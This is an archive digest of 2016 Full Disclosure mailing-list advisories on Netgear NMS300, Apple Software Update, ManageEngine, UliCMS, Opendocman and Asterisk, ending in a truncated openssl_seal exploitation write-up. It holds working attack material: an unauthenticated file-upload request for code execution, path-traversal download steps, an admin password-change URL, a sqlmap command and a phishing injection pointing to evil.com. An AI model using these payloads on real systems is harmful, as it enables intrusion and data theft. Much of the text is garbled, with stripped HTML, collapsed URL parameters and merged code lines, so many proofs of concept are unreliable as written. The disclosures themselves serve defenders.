gain administrative control through the Telnet service of the system (when
enabled) leading to integrity, loss of confidentiality, or loss of
availability.

*3.Sensitive info leakage via device running configuration backup *
*CVE-ID*: CVE-2015-7247

Usernames, Passwords, keys, values and web account hashes (super & admin)
are stored in clear­text and not masked. It is noted that restricted
'support' user may also access this config backup file from the portal
directly, gather clear-text admin creds, and gain full, unauthorized access
to the device.
-- 
Best Regards,
Karn Ganeshen
ipositivesecurity.blogspot.in

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Apple Software Update 2.1.3 (Windows) Remote Command Execution.

[Rio Sherri]

Apple software update is an utility to update apple software on windows
machines. The update proccess uses this kind of architecture.
First the software makes a request to
http://swcatalog.apple.com/content/catalogs/others/index-windows-1.sucatalog
This returns a xml file containing url of ".dist" files, and there were
some more interesting things

key>Packages


URL

http://swcdn.apple.com/content/downloads/61/34/061-8153/WgWXrHyJVmFn9KrXRg3w2XPXNFXxhnZFS6/BootCampUpdate32.msp

.
.
.
.


MSP is a file extension for a Windows Installer patch file format used by
Windows and Microsoft programs,
typically for bug fixes, security updates and hotfixes. Since the program
connects with the host in plain
text http we can use a MITM attack and modify the response and the link to
a malicous .msp and we get a remote command execution.

There are even .exe files

.
.
.
URL
string>
http://swcdn.apple.com/content/downloads/21/23/061-4512/BKYTZyKmtNr5wpxQCTy9f8xDSYPZ5MTGf4/BCLocUpdateEnable.exe

.
.
.

Apart from this if we take a look at the .dist file the program uses XML
files. It has options for urls,arch, etc etc
An example:
http://swcdn.apple.com/content/downloads/42/17/031-43074/ts4e9jo3pe732xq8ghsq504uye3x1dt7az/031-43074.English.dist
Has the following content










BootCampUpdate32.msp

.
.
.
.
.

It has a "rtf" file content which is runned when the installation
begins.(Which can lead to exploitation of Word Bugs)
It has a html file content which is runned through IE Scripting
Engine(Which can lead to exploitation of Internet Explorer Bugs)

The other intersting thing is


AppleApplicationSupport.msi
QuickTime.msi
QuickTime.msi
QuickTimeInstallerAdmin.exe


Basically this are the commands that get executed throughout installation.
So modifying this response through a MITM, adding an argument as below
From:
QuickTime.msi
To:
QuickTime.msi

Our command executes.

Rio Sherri
Infogen AL

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] ArpON (ARP handler inspection) 3.0-ng release

[Andrea Di Pasquale]

Hello guys,

we have released the next generation 3.0 version.

ArpON is a Host-based solution that make the ARP standardized protocol
secure in order to avoid the Man In The Middle (MITM) attack through the
ARP spoofing, ARP cache poisoning or ARP poison routing attack.

For further information please visit:

http://arpon.sourceforge.net


Thank you in advance.

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] [CERT 777024 / CVE-2016-1524/5]: RCE and file download in Netgear NMS300

[Pedro Ribeiro]

Hi,

CERT/CC has helped me disclose two vulnerabilities in NETGEAR's
Pro"safe" Network Management System 300 [1]. Two classical bugs: one
remote code execution via arbitrary file upload and an authenticated
arbitrary file download.

The full advisory can be seen in my repo at [2] and it is also pasted
below. I've also released two Metasploit modules to exploit these
vulnerabilities [3][4].

There is currently no fix for these - do not expose NMS300 to the
Internet! I've decided to release the exploits anyway as CERT's advisory
details how the vulnerability can be exploited.

Regards,
Pedro

[1] https://www.kb.cert.org/vuls/id/777024
[2]
https://raw.githubusercontent.com/pedrib/PoC/master/advisories/netgear_nms_rce.txt
[3] https://github.com/rapid7/metasploit-framework/pull/6530
[4] https://github.com/rapid7/metasploit-framework/pull/6531


>> Remote code execution / arbitrary file download in NETGEAR ProSafe
Network Management System NMS300
>> Discovered by Pedro Ribeiro (ped...@gmail.com), Agile Information
Security (http://www.agileinfosec.co.uk/)
==
Disclosure: 04/02/2016 / Last updated: 04/02/2016


>> Background on the affected product:
"NMS300
ProSAFE® Network Management System
Diagnose, control, and optimize your network devices.

The NETGEAR Management System NMS300 delivers insight into network
elements, including third-party devices. An intuitive, web-based user
interface makes it easier to monitor and administer an entire network."


>> Summary:
Netgear's NMS300 is a network management utility that runs on Windows
systems. It has serious two vulnerabilities that can be exploited by a
remote attacker. The first one is an arbitrary file upload vulnerability
that allows an unauthenticated attacker to execute Java code as the
SYSTEM user.
The second vulnerability is an arbitrary file download that allows an
authenticated user to download any file from the host that is running
NMS300.

A special thanks to Joel Land of CERT/CC for helping disclose this
vulnerability under ID 777024 [1]. Two new Metasploit modules that
exploit these vulnerabilities have been released.


>> Technical details:
#1
Vulnerability: Remote code execution via arbitrary file upload
(unauthenticated)
CVE-2016-1525
Affected versions:
NMS300 1.5.0.11
NMS300 1.5.0.2
NMS300 1.4.0.17
NMS300 1.1.0.13

There are two servlets that allow unauthenticated file uploads:
@RequestMapping({ "/fileUpload.do" })
public class FileUpload2Controller
- Uses spring file upload

@RequestMapping({ "/lib-1.0/external/flash/fileUpload.do" })
public class FileUploadController
- Uses flash upload

The JSP file can be uploaded as shown below, it will be named
null[name].[extension] and can be reached on
http://[host]:8080/null[name].[extension].
So for example if [name] = "testing" and [extension] = ".jsp", the final
file will be named "nulltesting.jsp". [name] and [extension] can be seen
in the sample request below. The code will execute as the SYSTEM user.

POST /lib-1.0/external/flash/fileUpload.do HTTP/1.1
Content-Type: multipart/form-data;
boundary=--ae0KM7Ef1ei4GI3gL6gL6gL6gL6GI3

ae0KM7Ef1ei4GI3gL6gL6gL6gL6GI3
Content-Disposition: form-data; name="name"

[name]
ae0KM7Ef1ei4GI3gL6gL6gL6gL6GI3
Content-Disposition: form-data; name="Filedata";
filename="whatever.[extension]"
Content-Type: application/octet-stream

<%@ page language="java" contentType="text/html; charset=ISO-8859-1"
pageEncoding="ISO-8859-1"%>
http://www.w3.org/TR/html4/loose.dtd;>



Hello World Example


A Hello World Example of JSP.


ae0KM7Ef1ei4GI3gL6gL6gL6gL6GI3--


#2
Vulnerability: Arbitrary file download (authenticated)
CVE-2016-1524
Affected versions:
NMS300 1.5.0.11
NMS300 1.5.0.2
NMS300 1.4.0.17
NMS300 1.1.0.13

Three steps need to be taken in order to exploit this vulnerability:
a) Add a configuration image, with the realName parameter containing the
path traversal to the target file:
POST /data/config/image.do?method=add HTTP/1.1
realName=../../../../../../../../../../===1337=Netgear=4=FS526Tv2=bla

b) Obtain the file identifier (imageId) for the image that was created
by scraping the page below for "imagename.img" (the fileName parameter
in step 1):
POST /data/getPage.do?method=getPageList=configImgManager
everyPage=1

Sample response:
{"page":{"beginIndex":0,"recordCount":7,"totalRecords":7,"currentPage":1,"everyPage":10,"totalPage":1},"list":[{"imageId":"1","fileName":"agga5.img","createTime":"10/03/2015
21:12:36","realFileName":"../../../../../../../../../../log.txt","vendor":"Netgear","deviceType":"4","deviceModel":"FS526Tv2","version":"2323","sizeM":"24491","createBy":"admin","createId":"1","description":"bla\r\n"}

c) Download the file with the imageId obtained in step 2:
GET /data/config/image.do?method=export=


>> Fix:
No fix is currently available. It is recommended not to expose NMS300 to
the Internet or any unstrusted networks.


>> 

[FD] AST-2016-002: File descriptor exhaustion in chan_sip

[Asterisk Security Team]

   Asterisk Project Security Advisory - AST-2016-002

 ProductAsterisk  
 SummaryFile descriptor exhaustion in chan_sip
Nature of Advisory  Denial of Service 
  SusceptibilityRemote Unauthenticated Sessions   
 Severity   Minor 
  Exploits KnownYes   
   Reported On  September 17, 2015
   Reported By  Alexander Traud   
Posted On   February 3, 2016  
 Last Updated OnFebruary 3, 2016  
 Advisory Contact   Richard Mudgett   
 CVE Name   Pending   

Description  Setting the sip.conf timert1 value to a value higher than
 1245 can cause an integer overflow and result in large   
 retransmit timeout times. These large timeout values hold
 system file descriptors hostage and can cause the system to  
 run out of file descriptors. 

Resolution  Setting the sip.conf timert1 value to 1245 or lower will not  
exhibit the vulnerability. The default timert1 value is 500.  
Asterisk has been patched to detect the integer overflow and  
calculate the previous retransmission timer value.

   Affected Versions   
 Product   Release  
   Series   
  Asterisk Open Source  1.8.x   All versions  
  Asterisk Open Source  11.xAll versions  
  Asterisk Open Source  12.xAll versions  
  Asterisk Open Source  13.xAll versions  
   Certified Asterisk  1.8.28   All versions  
   Certified Asterisk   11.6All versions  
   Certified Asterisk   13.1All versions  

  Corrected In
  Product  Release
Asterisk Open Source   11.21.1, 13.7.1
 Certified Asterisk11.6-cert12, 13.1-cert3

  Patches  
 SVN URL   Revision 
 
   http://downloads.asterisk.org/pub/security/AST-2016-002-1.8.28.diff 
Certified 
   Asterisk 
 
   1.8.28   
 
   http://downloads.asterisk.org/pub/security/AST-2016-002-11.6.diff   
Certified 
   Asterisk 
 
   11.6 
 
   http://downloads.asterisk.org/pub/security/AST-2016-002-13.1.diff   
Certified 
   Asterisk 
 
   13.1 
 
   http://downloads.asterisk.org/pub/security/AST-2016-002-1.8.diffAsterisk 
 
   1.8  
 
   http://downloads.asterisk.org/pub/security/AST-2016-002-11.diff Asterisk 
 
   11   
 
   http://downloads.asterisk.org/pub/security/AST-2016-002-12.diff Asterisk 
 
   12   
 
   http://downloads.asterisk.org/pub/security/AST-2016-002-13.diff Asterisk 
 
   13   
 

Links  https://issues.asterisk.org/jira/browse/ASTERISK-25397 

Asterisk Project Security Advisories are posted at
http://www.asterisk.org/security  
  
This document may be superseded by later versions; if so, the latest  
version will be posted at 
http://downloads.digium.com/pub/security/AST-2016-002.pdf and 
http://downloads.digium.com/pub/security/AST-2016-002.html

Revision History
   Date 

[FD] ManageEngine Eventlog Analyzer v4-v10 Privilege Esacalation

[graphx]

# Exploit Title: ManageEngine Eventlog Analyzer Privilege Escalation
# Exploit Author: @GraphX
# Vendor Homepage:http://www.manageengine.com
# Version: 4.0 - 10


1. Description:
The manageengine eventlog analyzer fails to properly verify user
privileges when making changes via the userManagementForm.do.  An
unprivileged user would be allowed to make changes to any account by
changing the USER_ID field to a number corresponding to another user. 
Testing discovered that the default admin and guest accounts are 1 and 2.

Considering the recent similar vulnerabilities discovered in a more
current version of a similar product by ManageEngine, it is possible that
more versions of the software including current, are vulnerable. According
to the vendor this is fixed in version 10.8.


2) Proof of Concept

-login as an unprivileged user
-Use the following URL to change the admin password to "admin"

http:///event/userManagementForm.do?addField=false=request.getParameter(=admin=_ID=1=Save+User+Details=admin


3 Solution:
Upgrade to 10.8



___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Atutor 2.2: XSS

[Curesec Research Team (CRT)]

Security Advisory - Curesec Research Team

1. Introduction

Affected Product:Atutor 2.2
Fixed in:partly in ATutor 2.2.1-RC1, complete in 2.2.1
Fixed Version Link:  http://www.atutor.ca/atutor/download.php
Vendor Website:  http://www.atutor.ca/
Vulnerability Type:  XSS
Remote Exploitable:  Yes
Reported to vendor:  11/17/2015
Disclosed to public: 02/01/2016
Release mode:Coordinated Release
CVE: n/a
Credits  Tim Coen of Curesec GmbH

2. Overview

Atutor is a learning management system (LMS) written in PHP. In version 2.2, it
is vulnerable to multiple reflected and persistent XSS attacks.

The vulnerabilities can lead to the stealing of cookies, injection of
keyloggers, or the bypassing of CSRF protection. If the victim is an admin, a
successful exploitation can lead to code execution via the theme uploader, and
if the victim is an instructor, this can lead to code execution via a file
upload vulnerability in the same version of Atutor.

3. Details

XSS 1: Reflected XSS - Calendar

CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N

Description: The calendar_next parameter of the calendar is vulnerable to XSS.
This issue has been fixed in ATutor 2.2.1-RC1.

Proof of Concept:

[FD] Time-based SQL Injection in Admin panel UliCMS <= v9.8.1

[Manuel Garcia Cardenas]

=
MGC ALERT 2016-001
- Original release date: January 26, 2016
- Last revised:  February 02, 2016
- Discovered by: Manuel García Cárdenas
- Severity: 7,1/10 (CVSS Base Score)
=

I. VULNERABILITY
-
Time-based SQL Injection in Admin panel UliCMS <= v9.8.1

II. BACKGROUND
-
UliCMS is a modern web content management solution from Germany, that
attempts to make web content management more easier.

III. DESCRIPTION
-
This bug was found using the portal with authentication as administrator.
To exploit the vulnerability only is needed use the version 1.0 of the HTTP
protocol to interact with the application.

It is possible to inject SQL code in the variable "country_blacklist" on
the page "action=spam_filter".

IV. PROOF OF CONCEPT
-
The following URL's and parameters have been confirmed to all suffer from
Time Based Blind SQL injection.

/ulicms/admin/?action=spam_filter

(POST)
spamfilter_enabled=yes_words_blacklist=a_blacklist=ru_spamfilter_settings=Save+Changes

POC using SQLMap:

sqlmap -u "http://127.0.0.1/ulicms/admin/?action=spam_filter; --cookie="SET
COOKIE HERE"
--data="spamfilter_enabled=yes_words_blacklist=a_blacklist=ru_spamfilter_settings=Save+Changes"
-p "country_blacklist" --dbms="mysql" --dbs

V. BUSINESS IMPACT
-
Public defacement, confidential data leakage, and database server
compromise can result from these attacks. Client systems can also be
targeted, and complete compromise of these client systems is also possible.

VI. SYSTEMS AFFECTED
-
UliCMS <= v9.8.1

VII. SOLUTION
-
Install vendor patch.

VIII. REFERENCES
-
http://en.ulicms.de/

IX. CREDITS
-
This vulnerability has been discovered and reported
by Manuel García Cárdenas (advidsec (at) gmail (dot) com).

X. REVISION HISTORY
-
January 26, 2016 1: Initial release
February 02, 2015 2: Revision to send to lists

XI. DISCLOSURE TIMELINE
-
January 26, 2016 1: Vulnerability acquired by Manuel Garcia Cardenas
January 26, 2016 2: Send to vendor
January 28, 2016 3: Vendor fix vulnerability
February 02, 2016 4: Send to the Full-Disclosure lists

XII. LEGAL NOTICES
-
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.

XIII. ABOUT
-
Manuel Garcia Cardenas
Pentester

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Opendocman 1.3.4: HTML Injection

[Curesec Research Team (CRT)]

Security Advisory - Curesec Research Team

1. Introduction

Affected Product:Opendocman 1.3.4
Fixed in:1.3.5
Fixed Version Link:  http://www.opendocman.com/free-download/
Vendor Website:  http://www.opendocman.com/
Vulnerability Type:  HTML Injection
Remote Exploitable:  Yes
Reported to vendor:  11/21/2015
Disclosed to public: 02/01/2016
Release mode:Coordinated Release
CVE: n/a
Credits  Tim Coen of Curesec GmbH

2. Overview

CVSS

Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N

Description

To defend against XSS and similar attacks, opendocman depends on a function
that filters all input to remove dangerous tags and attributes.

The filter does filter out all simple approaches to XSS, but it still leaves an
attacker with large control over the look and functionality of the website.
This can lead to phishing attacks, privilege escalation, defacement, and may
lead to XSS with older browsers.

There are likely other possibilities for attackers. It is recommended to
HTML-encode user input before echoing it to mitigate these issues, instead of
relying on input filtering.

These issues are present across the application and are reflected as well as
persistent, for example via the profile or comments.

3. Proof of Concept

Privilege Escalation

A registered user can exploit this issue in combination with social engineering
to gain admin rights:

- Change any profile field, such as last name, to: 
Smith">http://localhost/opendocman-1.3.4/search.php/;>

Phishing & Defacement

Attacker-controlled elements can be shown in places where a user would only
expect application-controlled data, not user data, which can be used in
phishing attacks or to deface the website.

A simple example would be:

http://localhost/opendocman-1.3.4/search.php/;>http://evil.com; style= 
"background: red; color: white">Security Alert: Please upgrade to the latest 
version here!http://localhost/opendocman-1.3.4/add.php
The same is possible when updating a user profile here:
http://localhost/opendocman-1.3.4//profile.php
It should be noted that by default, the registration is not open, but there is
an option to open registration for anyone.

4. Code

The problem exists across the application. A quick search reveals at least
these code snippets which are likely open to reflected attacks. Further
parameters are likely vulnerable as well. Additionally, all user input that is
persisted seems to be affected as well.

check-out.php:';
category.php:
rejects.php:echo '';
rejects.php:echo '';
search.php:http://www.opendocman.com/free-download/

Please note that a newer version might already be available.

6. Report Timeline

11/21/2015 Informed Vendor about Issue (no reply)
12/10/2015 Reminded Vendor of disclosure date
12/19/2015 Vendor sends fix for different issue for verification
01/13/2016 Confirmed fix
01/20/2016 Vendor requests more time to fix XSS issues
01/31/2016 Vendor releases fix
02/01/2015 Disclosed to public


Blog Reference:
https://blog.curesec.com/article/blog/Opendocman-134-HTML-Injection-151.html
 
--
blog:  https://blog.curesec.com
tweet: https://twitter.com/curesec

Curesec GmbH
Curesec Research Team
Romain-Rolland-Str 14-24
13089 Berlin, Germany

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Dell SecureWorks iOS Application - MITM SSL Certificate Vulnerability

[David Coomber]

Dell SecureWorks iOS Application - MITM SSL Certificate Vulnerability
--
http://www.info-sec.ca/advisories/Dell-SecureWorks.html

Overview

"Access your critical Dell SecureWorks security information on the go."

"With the Dell SecureWorks Mobile App you can:

* Quickly respond to security incidents on your mobile device
* Review/update/create tickets for your critical security events
* Contact the Dell SecureWorks Secure Operations Centers 24/7/365
* Get the latest threat intelligence from our award winning Counter
Threat Intelligence (CTU) team"

(https://itunes.apple.com/us/app/dell-secureworks/id533072046)

Issue

The Dell SecureWorks iOS application (version 2.0.6 and below) does
not validate the SSL certificate it receives when connecting to a
secure site.

Impact

An attacker who can perform a man in the middle attack may present a
bogus SSL certificate which the application will accept silently.
Usernames, passwords and sensitive information could be captured by an
attacker without the user's knowledge.

Timeline

October 4, 2015 - Notified Dell SecureWorks via
secur...@secureworks.com & secur...@dell.com
October 6, 2015 - Dell SecureWorks responded stating that they are investigating
October 15, 2015 - Dell SecureWorks asked for steps to reproduce the
vulnerability
October 15, 2015 - Provided steps to reproduce
October 22, 2015 - Dell SecureWorks confirmed the vulnerability
October 22, 2015 - Asked for a timeline to release the new version
October 26, 2015 - Dell SecureWorks responded stating they are working
on an update but do not have a timeline
February 2, 2016 - Dell SecureWorks released version 2.1 which
resolves this vulnerability

Solution

Upgrade to version 2.1 or later

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] CALL FOR PAPERS - FAQin Congress - Madrid

[Esteban Dauksis]

The FAQin Association is proud to announce the call for [ papers,
presentations, proposals ] at FAQin congress

-=] About FAQin Congress

FAQin congress is a free invitation-only underground hacking event in
Madrid, Spain at We Rock venue from 5th to 6th of March. No press, no
cops... Just you, your peers and a bunch of free beer. Think about it.

Attendance is free, attendees must pass a CTF-like challenge to get a
ticket. Full details at www.faqin.org

-=] We are looking for offensive focused content:

 - Reverse engineering [ Hardware, Software, Protocol... ]
 - Writing and using exploits
 - Bypassing protections
 - Attacks on cryptography
 - Or any kind of offensive hacking

-=] Guidelines:

 - 45 minute slots, if you need double slot let us know.
 - We are open to proposals for workshops, demos, live hacks...


Please send an abstract, bio and "mugshot" to c...@faqin.org before 15th of
February.




Questions? Free tickets?  i...@faqin.org

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] AST-2016-003: Remote crash vulnerability when receiving UDPTL FAX data.

[Asterisk Security Team]

   Asterisk Project Security Advisory - AST-2016-003

 ProductAsterisk  
 SummaryRemote crash vulnerability when receiving UDPTL FAX   
data. 
Nature of Advisory  Denial of Service 
  SusceptibilityRemote Authenticated Sessions 
 Severity   Minor 
  Exploits KnownYes   
   Reported On  December 2, 2015  
   Reported By  Walter Dokes, Torrey Searle   
Posted On   February 3, 2016  
 Last Updated OnFebruary 3, 2016  
 Advisory Contact   Richard Mudgett   
 CVE Name   Pending   

Description  If no UDPTL packets are lost there is no problem. However,   
 a lost packet causes Asterisk to use the available error 
 correcting redundancy packets. If those redundancy packets   
 have zero length then Asterisk uses an uninitialized buffer  
 pointer and length value which can cause invalid memory  
 accesses later when the packet is copied.

Resolution  Upgrade to a released version with the fix incorporated or
apply patch.  

   Affected Versions   
 Product   Release  
   Series   
  Asterisk Open Source  1.8.x   All versions  
  Asterisk Open Source  11.xAll versions  
  Asterisk Open Source  12.xAll versions  
  Asterisk Open Source  13.xAll versions  
   Certified Asterisk  1.8.28   All versions  
   Certified Asterisk   11.6All versions  
   Certified Asterisk   13.1All versions  

  Corrected In
  Product  Release
Asterisk Open Source   11.21.1, 13.7.1
 Certified Asterisk11.6-cert12, 13.1-cert3

  Patches  
 SVN URL   Revision 
 
   http://downloads.asterisk.org/pub/security/AST-2016-003-1.8.28.diff 
Certified 
   Asterisk 
 
   1.8.28   
 
   http://downloads.asterisk.org/pub/security/AST-2016-003-11.6.diff   
Certified 
   Asterisk 
 
   11.6 
 
   http://downloads.asterisk.org/pub/security/AST-2016-003-13.1.diff   
Certified 
   Asterisk 
 
   13.1 
 
   http://downloads.asterisk.org/pub/security/AST-2016-003-1.8.diffAsterisk 
 
   1.8  
 
   http://downloads.asterisk.org/pub/security/AST-2016-003-11.diff Asterisk 
 
   11   
 
   http://downloads.asterisk.org/pub/security/AST-2016-003-12.diff Asterisk 
 
   12   
 
   http://downloads.asterisk.org/pub/security/AST-2016-003-13.diff Asterisk 
 
   13   
 

Links  https://issues.asterisk.org/jira/browse/ASTERISK-25603 

Asterisk Project Security Advisories are posted at
http://www.asterisk.org/security  
  
This document may be superseded by later versions; if so, the latest  
version will be posted at 
http://downloads.digium.com/pub/security/AST-2016-003.pdf and 
http://downloads.digium.com/pub/security/AST-2016-003.html

Revision History
  Date  

[FD] Opendocman 1.3.4: CSRF

[Curesec Research Team (CRT)]

Security Advisory - Curesec Research Team

1. Introduction

Affected Product:Opendocman 1.3.4
Fixed in:1.3.5
Fixed Version Link:  http://www.opendocman.com/free-download/
Vendor Website:  http://www.opendocman.com/
Vulnerability Type:  CSRF
Remote Exploitable:  Yes
Reported to vendor:  11/21/2015
Disclosed to public: 02/01/2016
Release mode:Coordinated Release
CVE: n/a
Credits  Tim Coen of Curesec GmbH

2. Overview

CVSS

Medium 5.1 AV:N/AC:H/Au:N/C:P/I:P/A:P

Description

Opendocman does not have CSRF protection, which means that an attacker can
perform actions for an admin, if the admin visits an attacker controlled
website while logged in.

3. Proof of Concept

Add new Admin User:


  
http://localhost/opendocman-1.3.4/user.php; method="POST" 
enctype="multipart/form-data">
  
  
  
  
  
  
  
  
  
  
  
  

  



4. Solution

To mitigate this issue please upgrade at least to version 1.3.5:

http://www.opendocman.com/free-download/

Please note that a newer version might already be available.

5. Report Timeline

11/21/2015 Informed Vendor about Issue (no reply)
12/10/2015 Reminded Vendor of disclosure date
12/19/2015 Vendor sends fix for CSRF for verification
01/13/2016 Confirmed CSRF fix
01/20/2016 Vendor requests more time to fix other issues in same version
01/31/2016 Vendor releases fix
02/01/2015 Disclosed to public


Blog Reference:
https://blog.curesec.com/article/blog/Opendocman-134-CSRF-150.html
 
--
blog:  https://blog.curesec.com
tweet: https://twitter.com/curesec

Curesec GmbH
Curesec Research Team
Romain-Rolland-Str 14-24
13089 Berlin, Germany

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] A tale of openssl_seal(), PHP and Apache2handle

[s3810]

Hey folks,

The openssl_seal() [4] is prone to use uninitialized memory that can be
turned into a code execution. This document describes technical details of
our journey to hijack apache2 requests.

What the heck is openssl_seal()?

[...]
int openssl_seal ( string $data , string &$sealed_data , array &$env_keys , 
array $pub_key_ids [,
string $method = "RC4" ] )

openssl_seal() seals (encrypts) data by using the given method with a
randomly generated secret key.  The key is encrypted with each of the
public keys associated with the identifiers in pub_key_ids and each
encrypted key is returned in env_keys. This means that one can send sealed
data to multiple recipients (provided one has obtained their public keys).
Each recipient must receive both the sealed data and the envelope key that
was encrypted with the recipient's public key.
[...]

Source: PHP documentation  [4]
But it doesn't matter that much what it's intended to do, let's see its
implementation.

The Bug

4888 /* {{{ proto int openssl_seal(string data,  sealdata,  ekeys, 
array pubkeys)
4889Seals data */
4890 PHP_FUNCTION(openssl_seal)
4891 {
4892zval *pubkeys, *pubkey, *sealdata, *ekeys, *iv = NULL;
4893HashTable *pubkeysht;
4894EVP_PKEY **pkeys;
[...]
4895zend_resource ** key_resources; /* so we know what to cleanup */
4905if (zend_parse_parameters(ZEND_NUM_ARGS(), "sz/z/a/|sz/", , 
_len,
4906, , , , _len, ) == 
FAILURE) {
4907return;
4908}
4909pubkeysht = Z_ARRVAL_P(pubkeys);
4910nkeys = pubkeysht ? zend_hash_num_elements(pubkeysht) : 0;
4911if (!nkeys) {
4912php_error_docref(NULL, E_WARNING, "Fourth argument to 
openssl_seal() must be a non-empty array");
4913RETURN_FALSE;
4914}
[...]
4935pkeys = safe_emalloc(nkeys, sizeof(*pkeys), 0);
[...]
4939key_resources = safe_emalloc(nkeys, sizeof(zend_resource*), 0);
4940memset(key_resources, 0, sizeof(zend_resource*) * nkeys);
4941
4942/* get the public keys we are using to seal this data */
4943i = 0;
4944ZEND_HASH_FOREACH_VAL(pubkeysht, pubkey) {
4945pkeys[i] = php_openssl_evp_from_zval(pubkey, 1, NULL, 0, 
_resources[i]);
4946if (pkeys[i] == NULL) {
4947php_error_docref(NULL, E_WARNING, "not a public key (%dth 
member of pubkeys)", i+1);
4948RETVAL_FALSE;
4949goto clean_exit;
4950}
4951eks[i] = emalloc(EVP_PKEY_size(pkeys[i]) + 1);
4952i++;
4953} ZEND_HASH_FOREACH_END();
[...]
5000 clean_exit:
5001for (i=0; ireferences, -1, CRYPTO_LOCK_EVP_PKEY);
[...]
387 if (i > 0)
388 return;
[...]
395 EVP_PKEY_free_it(x);
396 if (x->attributes)
397 sk_X509_ATTRIBUTE_pop_free(x->attributes, X509_ATTRIBUTE_free);
398 OPENSSL_free(x);
399 }

Source: 
http://nxr.netbsd.org/xref/src/crypto/external/bsd/openssl/dist/crypto/evp/p_lib.c#376

Thanks to x == NULL check it wasn't found by unit tests. One obvious way
to exploit this bug is to trigger double free and then try to mess up
something, but OpenSSL uses allocator from libc which usually deals with
double free pretty well. There's an option to manipulate memory via
CRYPTO_add (as we control x), but decreasing by 1 will not get us far.
Let's dig deeper and see the EVP_PKEY_free_it() implementation:

401 static void EVP_PKEY_free_it(EVP_PKEY *x)
402 {
403 if (x->ameth && x->ameth->pkey_free) {
404 x->ameth->pkey_free(x);
405 x->pkey.ptr = NULL;
406 }
[...]

Source: